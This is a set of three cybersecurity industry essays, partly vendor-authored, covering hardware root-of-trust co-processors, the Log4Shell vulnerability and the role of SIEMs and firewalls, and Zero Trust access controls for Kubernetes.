Cybersecurity has never felt more porous. You are no doubt aware of the grim statistics:

•The average cost of a data breach rose year-over-year from $3.86 million to $4.24 million in 2021, according to IBM.

•The majority of cyberattacks result in damages of $500,000 or more, Cisco says.

•A sobering analysis by Cybersecurity Ventures forecasts that the global cost of ransomware attacks will reach $265 billion in 2031.

The FBI reports that 3,000-4,000 cyberattacks are counted each day.

That’s just a sample of what is obvious to anyone in the industry: we’re in a war with cybercriminals, and we can hardly say we’re winning.

The vulnerabilities of internet security, once mostly a nuisance, have become dangerous and costly. Data privacy breaches expose sensitive details about customers, staff, and company financials. Security software may have been a satisfactory product at the turn of the century, but despite massive levels of investment, many experts now realize that it is not adequate for dealing with contemporary threats.

We reached this point of friction because of the compound effect of two shortcomings. One, security was too often treated as an afterthought by the industry, taking a backseat to a device’s speed, functionality, and design. Security remains an added expense that isn’t easy to market, especially when third-party software solutions have been so widely adopted.

But those software choices have proven to be lacking in dependability and often require patches or upgrades that are costly to the end user. Second, the design of security solutions struggled to scale up properly or adapt to the technological changes in the industry, especially in disaggregated compute networks.

Sirineni

Meanwhile the attack surface keeps broadening with the increasing interconnectivity of services, product chains, and user interfaces. Seeing the flaws continue year after year, the industry began linking authentication of valid software components to the underlying hardware, or the “root of trust”.

This approach allows for compromised software to be identified during the authentication process. However, hackers have attacked unsecured hardware and compromised this root. Thus, secure implementations are critical.

Compounding issues is the nature of threat response: it’s reactive, searching for known threats, while cybercriminals regularly devise new, surreptitious methods to avoid detection. Too frequently, security upgrades occur only after successful attacks have taken place, and most fixes are not sufficient to stand up to a new type of attack.

The good news is, artificial intelligence is here and is showing great promise to deliver what the market needs, that is, pre-emptive and proactive threat detection. In fact, AI is on the verge of providing a remedy for problems that have seemed insurmountable. New AI-based applications are poised to be game-changers for cybersecurity.

Implementing security solutions, such as secure hardware root-of-trust and proactive AI in a piecemeal approach and through multiple compute processor vendors, creates complexity and increases the attack surface for cybercriminals. That can cause deficiencies because of varying implementation quality.

Ideally, these security measures can be offloaded to a dedicated security co-processor that would reside in the control and management plane, separated from the data plane of the main processors. Such a co-processor would be positioned to act as a security watchguard for the entire system and provide a pre-emptive measure to fight cybercrime.

At Axiado, we believe an AI-driven trusted control/compute unit, or TCU, provides the level of protection the data-communications industry is demanding. The TCU is designed as a stand-alone processor that will reside on a motherboard next to a CPU, GPU or other compute engine.

This security-by-design solution for the control and management plane is based on proprietary Axiado technology, including Secure Vault™ (a secure hardware root-of-trust, cryptography engine and secure key/certificate storage), Secure AI™ (a pre-emptive threat-detection hardware engine), and firewall advancements.

Hardware with a TCU included will allow companies to pre-emptively detect threats and minimize the endless and often inadequate number of security patches they have been forced to choose for years.

Cybercriminals are nimble, use updated software, and are often determined. With an unprecedented number of attacks inundating global databases, it is the time to end threats with an AI-assisted hardware solution that denies cybercriminals entry into networks and the precious data they store.

About the essayist. Gopi Sirineni is the CEO of Axiado, which supplies advanced technologies to secure the hardware root of trust.

Log4j is the latest, greatest vulnerability to demonstrate just how tenuous the security of modern networks has become.

Log4j, aka Log4Shell, blasted a surgical light on the multiplying tiers of attack vectors arising from enterprises’ deepening reliance on open-source software.

Related: The exposures created by API profileration

This is all part of corporations plunging into the near future: migration to cloud-based IT infrastructure is in high gear, complexity is mushrooming and fear of falling behind is keeping the competitive heat on. In this heady environment, open-source networking components like Log4j spell opportunity for threat actors. It’s notable that open-source software vulnerabilities comprise just one of several paths ripe for malicious manipulation.

By no means has the cybersecurity community been blind to the complex security challenges spinning out of digital transformation. A methodical drive has been underway for at least the past decade to affect a transition to a new network security paradigm – one less rooted in the past and better suited for what’s coming next.

Log4j bathes light on a couple of solidifying developments. It reinforces the notion that a new portfolio of cloud-centric security frameworks must take hold, the sooner the better. What’s more, it will likely take a blend of legacy security technologies – in advanced iterations – combined with a new class of smart security tools to cut through the complexities of defending contemporary business networks.

I’ve recently had several deep-dive discussions with cybersecurity experts at Juniper Networks, about this. The Sunnyvale, Calif.-based networking systems supplier, like any number of other established tech giants, as well as innumerable cybersecurity startups, is deeply vested in seeing this transition through to the end. Here are key takeaways:

Messy co-dependencies

It’s ironic that open-source software is steeped in altruism. In the early days of the Internet, coders created new programs for the sake of writing good code, then made it available for anyone to use and extend, license free. However, once the commercial Internet took hold, developers began leveraging open-source components far and wide in proprietary systems.

Open-source vulnerabilities in enterprise networks have since become a massive security blind spot. Log4j was preceded by JBoss, Poodle, Shellshock and Heartbleed. These were all obscure open-source components that, over time, became deeply embedded in enterprise systems across the breadth of the Internet, only to have a gaping vulnerability discovered in them late in the game.

Log4j, for instance, is a ubiquitous logging library. Its rather mundane function is to record events in a log for a system administrator to review and act upon, later. Log4Shell now refers to the family of vulnerabilities — and related exploits — unearthed last December by a white hat researcher at Alibaba, the Chinese equivalent of Google. Left unpatched Log4Shell vulnerabilities present easy paths for a threat actor to take full control of the underlying system.

The bigger picture, says Mike Spanbauer, security evangelist at Juniper Networks, is that enterprises to this day continue to deploy open-source components often without consistent rigor of lacking the formal infusion of security quality assurance coding practices. Gaping security holes regularly get discovered by hackers – both white hat and black hat – engaged in probing randomly for soft spots.

Expediency and cost savings drove commercial adoption of open-source components in the early days of the commercial Internet. And the very same mindset persists today, perhaps even more so, as companies increasingly rely on open-source software to keep pace, observes Kate Adam, Juniper Network’s senior director of security product marketing.

Adam

“This is an established practice that’s now influencing in a new way due to how the business environment has shifted,” Adam says. The intensely competitive cybersecurity talent market is partly to blame here. Companies increasing reach for off-the-shelf open-source components, Adam says, to some degree because of the scarcity of skilled coders, especially those steeped in security.

“Some enterprises never use anything open-source and always do everything themselves, but that’s a massive undertaking, and they’re in a tiny minority,” she says. Indeed, according to the Linux Foundation, as much as 80 percent of the code in current applications is open source, often buried deep.

Log4Shell illuminated the security snarls and tangles created by software co-dependencies that, in many organizations, have congealed into a chaotic, indecipherable mess. Here’s how Spanbauer describes what this looks like — from the perspective of an enterprise’s IT and security teams.

“How a given open-source library works in a specific app can be a mystery because arbitrary parties contributed pieces of coding that may or may not have been documented,” he says. “This makes for very flexible, very agile code, but there is also an absence of the data that you need for your security models — to determine how to best protect the assets you’re responsible for . . . This is the current state of affairs for practically every organization, almost without exception. And these types of co-dependencies are here to stay. They’re now the norm and security teams must assess and manage the risk of these stacks.”

Legacy tech’s role

Log4Shell actually contributes to progress in this sense: it heightens awareness, which should help accelerate the transition to a much-needed new security paradigm. Many more Gordian-knot issues that need to be dealt with, to be sure. Complex and evolving cyber risks need to be resolved, for instance, when it comes to securing human and machine identities, tightening supply chains, mitigating third-party risks, protecting critical infrastructure and preserving individuals’ privacy.

Emerging frameworks, like Zero Trust Network Access (ZTNA,) Cloud Workload Protection Platform (CWPP,) Cloud Security Posture Management (CSPM) and Secure Access Service Edge (SASE) aim to help mitigate this spectrum of intensifying risks. Frameworks like these serve as guideposts. The task at hand is to steer the center of gravity for securing networks to the Internet edge, where cloud-centric resources and services increasingly reside.

This trend is well underway, and the handwriting is on the wall for many costly cybersecurity tools and services that were first installed 20 years to protect on-premises datacenter: obsolescence is on the near horizon. That said, a couple of prominent legacy technologies seem sure to endure as security cornerstones, moving forward. I’m referring to Security Information and Event Management (SIEM) systems and to firewalls.

SIEMs failed to live up to their hype in the decade after they were first introduced in 2005. Then about five years ago SIEMs got recast as the ideal mechanism for ingesting event log data arriving from Internet traffic, corporate hardware, mobile and IoT devices and cloud-hosted resources — the stuff of digital transformation.

This rejuvenation of SIEMs coincided with the emergence of advanced data analytics tools that could make more effective use of SIEM event logs; system orchestration became streamlined, human behavior got factored in and incident response became automated.

As cloud-hosted processing power and data storage have gained more traction, the role of on-premises data centers has declined. Yet legacy protections for on-premises data centers continue to predominate. The unhappy result: cyber exposures — and successful network breaches – have continued to scale up.

Log4Shell is just the latest reminder that gaping security holes lay dormant everywhere, just waiting to be discovered and exploited, in both the cloud and on-premises environments. Consider how ransomware has thrived in the transitional environment we’re now in, and how cyber espionage and cyber warfare have come to factor into geopolitical power struggles.

“Having the requisite technology to protect the data center and the edge actually is not enough, in and of itself,” Adam observes. “It’s now vital to be able to see the entire environment and respond to anomalies in near real time. SIEMs have become so popular because they pull everything together through logs.”

Visibility is vital

Where is this all taking us? New security frameworks, like ZTNA, CWPP, CSPM, and SASE are the blueprints for networks where the event logs ingested by SIEMs get put to higher uses detecting and responding to legitimate threats. This will come to fruition on smarter platforms using automated tools, including advanced firewalls.

Firewalls predate SIEMs. Firewalls arrived on day one of companies connecting their networks to the Internet. While a SIEM unit ingests incoming traffic for analysis, a firewall filters traffic flowing in and out of a network.

The earliest firewalls filtered the tiny packets of data exchanged between applications, allowing only the packets that met certain criteria to pass through. This became the basis for blacklisting traffic originating from known bad IP addresses and for restricting employees from connecting to malicious webpages.

Next Generation Firewalls (NGFW) came along in approximately the same time frame as the earliest SIEM systems. NGFWs could conduct deeper, much more detailed packet filtering and soon began taking on more advanced functionalities. NGFWs today can enforce security policies at the application, port, and protocol levels – often detecting and blocking the stealthiest malware from slipping into a network.

The evolution of firewalls, in fact, has never really slowed down and is continuing apace. Firewalls today come in an array of form factors; they’re available as an on-premises appliance, they can be set up to run virtually, or they can even be delivered as a subscription service.

Spanbauer

“You can’t protect what you can’t see,” Spanbauer says. “Visibility is the key. Companies today, at a minimum, need a way to accurately detect potentially malicious events in a highly complex environment, one that’s only getting more complex. When it comes to visibility, a SIEM helps me see as much data as possible, and a firewall helps me to enforce policy and ensure the accuracy of my verdicts. It’s vital to eliminate any false positives, otherwise I’d just be adding to the chaos and creating more work for teams to investigate.”

SIEMs and firewalls clearly will remain at the core of bringing machine learning and leading-edge analytics to bear in the data-rich environment we’re in. “These legacy technologies are going to have a place for a very long time to come — helping companies to more effectively manage this transition and to limit the chaos as much as possible,” Adam says.

It’s logical for SIEMs and firewalls to play ever larger roles in automating detection and response tasks as part of helping enterprises cut through the complexity and calm the chaos — and materially raise the bar for network security.  I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.


(LW provides consulting services to the vendors we cover.)

 

Some 96 percent of organizations — according to the recently released 2021 Cloud Native Survey — are either using or evaluating Kubernetes in their production environment, demonstrating that enthusiasm for cloud native technologies has, in the words of the report’s authors, “crossed the adoption chasm.”

Related: The targeting of supply-chain security holes

It’s easy to understand why a cloud-native approach elicits such fervor. By using flexible, modular container technologies such as Kubernetes and microservices, development teams are better equipped to streamline and accelerate the application lifecycle, which in turn enables the business to deliver on their ambitious digital transformation initiatives.

However, despite cloud-native’s promise to deliver greater speed and agility, a variety of legitimate security concerns have kept IT leaders from pushing the throttle on their cloud-native agenda.

According to the most recent State of Kubernetes Security report, more than half (55 percent) of respondents reported that they have delayed deploying Kubernetes applications into production due to security concerns (up 11 percent from the year prior) while 94 percent admitted to experiencing a security incident in their Kubernetes or container environment in the past year.

It’s clear that until we can deliver security at the same velocity in which containers are being built and deployed that many of our cloud-native aspirations will remain unfulfilled.

Cloud-native requirements

Traditionally, developers didn’t think much about application security until after deployment. However, as DevOps and modern development practices such as Continuous Integration and Continuous Delivery (CI/CD) have become the norm, we’ve come to appreciate that bolting security on after the fact can be a recipe for future application vulnerabilities.

Security must be ‘baked in’ rather than ‘brushed on’—and this current ethos has given rise to the DevSecOps movement where security plays a leading role in the DevOps process. However, it’s not enough to simply shoehorn these practices into the dynamic cloud-native development lifecycle.

Sivasankaran

Because traditional enterprise network security relies on static firewall rules that can only be updated in maintenance windows after a change approval process, securely developing and deploying applications in an automated way will not work in dynamic cloud environments where rules and policies are constantly in flux.

For this reason, most cloud environments come with built-in concepts like security groups and container service meshes that provide a way to control how different parts of an application share data with one another. While such methodologies might work well for simple applications, they lose their effectiveness as soon as you make a connection to or from various regions, clouds or technology stacks. For example, there is no interoperability between different cloud vendors’ security groups or different Kubernetes clusters.

Being cloud-native demands an approach that provides control and visibility across the entire application development lifecycle. A modern cloud-native security approach should tick the following three boxes:

•Dynamic: The ability to dynamically express and administer policies for controlling network traffic both to and from a Kubernetes pod should be considered table stakes, especially as software is being deployed across multiple cloud environments.

•Granular: Secure controls must extend to the ‘pod level’ of a container, not just the cluster level. A software-defined approach makes it easier to dispense granular access controls based on pre-defined policies that connects users to authorized functionality rather than simply at the network level.

•Unified: Slicing cloud-native security across multiple point solutions leaves you with a partial view. A unified policy engine should be omnidirectional and able to manage user-to-resource access (for both traditional and cloud native applications) and resource-to-resource access (in cloud native development environments).

Cloud-native Zero Trust

A Zero Trust security approach, which applies the principle of least privilege access, assumes there is no clearly defined network perimeter. Because it’s software-defined, policies can be easily applied to systems, applications and users alike.

As one of the original vendors in the Zero Trust access market, Appgate has a long history of success in helping our customers ensure secure access as they migrate more of their applications and workloads to the cloud. To support them as they grow their cloud-native development initiatives, we recently introduced new Kubernetes access control capabilities for our flagship Appgate SDP product.

By deploying Appgate SDP natively inside a Kubernetes cluster as a “sidecar”—a helper application of sorts that runs alongside an application container in a Kubernetes pod—Zero Trust principles can be universally applied throughout the cluster, while providing fine-grained, differentiated access controls on a per-pod basis, thereby delivering greater control over service-to-service access.

This effectively limits the potential attack surface and makes it more difficult for an attacker to escalate privileges in the event of a network compromise.

Organizations gain a single unified policy engine for Zero Trust access that enables them to control user-to-resource access (i.e., for remote user access) and resource-to-resource access (i.e., for containerized workloads) to streamline management and reduce complexity. This allows them to protect all users (remote, onsite and hybrid), all resources (traditional, cloud-native and legacy applications) and all environments (cloud, hybrid, multi-cloud and on-premises) with one solution.

Cloud-native application development brings enormous capacity for innovation and efficiency gains for many organizations. By embedding Zero Trust security principles into the process, we can realize the full potential of cloud-native.

About the essayist: Jawahar Sivasankaran is the President & COO of Appgate, a supplier of secure cybersecurity solutions for people, devices, and systems based on the principles of Zero Trust security.